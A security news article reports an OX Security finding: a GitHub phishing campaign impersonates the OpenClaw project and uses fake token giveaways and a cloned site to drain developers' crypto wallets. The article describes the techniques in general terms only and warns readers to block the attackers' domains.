Cryptocurrency scammers are capitalizing on the popularity of OpenClaw to target developers through a new GitHub phishing campaign aimed at draining cryptocurrency wallets.
summary
Attackers are impersonating OpenClaw on GitHub, creating fake accounts and tagging developers with messages offering them $5,000 in $CLAW tokens. Victims are directed to a cloned website where a malicious wallet connection prompt is used to cause wallet exfiltration. OX Security says the campaign uses obfuscated code and targeted tactics, but no confirmed victims have been reported so far.
A report published by the platform OX Security details an active phishing campaign targeting OpenClaw through a coordinated effort on GitHub. In this campaign, attackers created fake accounts, opened issue threads in attacker-controlled repositories, and tagged dozens of developers.
One such post details how a developer was approached with a message claiming to have been selected for an OpenClaw assignment, told that he had won $5,000 worth of $CLAW tokens, and was then redirected to a fake website that closely resembled openclaw.ai.
The website gives victims the option to connect their wallet through a malicious “Connect your wallet” prompt, which ultimately leads to wallet exfiltration.
The campaign surfaced as OpenClaw became a more high-profile project, especially after OpenAI CEO Sam Altman announced that OpenClaw creator Peter Steinberger would lead efforts on a personal AI agent. OpenClaw has since transitioned to an open source project run by the Foundation.
OX Security researchers said attackers may be leveraging GitHub’s star feature to identify users who have starred OpenClaw-related repositories, making them appear more targeted and trustworthy.
Fraudsters have been observed using files named “eleven.js” to embed wallet-stealing code within obfuscated JavaScript. Once triggered, scammers use built-in “nuclear” features that erase their traces from your browser’s local storage to avoid detection and continue tracking your activity.
The malware tracks user actions through commands such as PromptTx, Approved, and Declined and sends encoded data, including wallet addresses and transaction values, to a command and control server.
Researchers have identified at least one wallet address believed to be linked to the attackers that was used to receive the stolen funds. So far, no victims have been identified.
OX Security is urging users to block token-claw(.)xyz and watery-compost(.) starting today, and to avoid connecting their cryptocurrency wallets to newly surfaced or unverified sites.
Meanwhile, OpenClaw creator Peter Steinberger has enforced a strict anti-crypto policy. Mentioning cryptocurrencies throughout the project’s Discord server may lead to removal.
The decision stems from a scam that surfaced during the rebrand, in which the attackers promoted a Solana-based token called $CLAWD, and its market capitalization soared to around $16 million, only to fall more than 90% after Steinberger denied involvement.
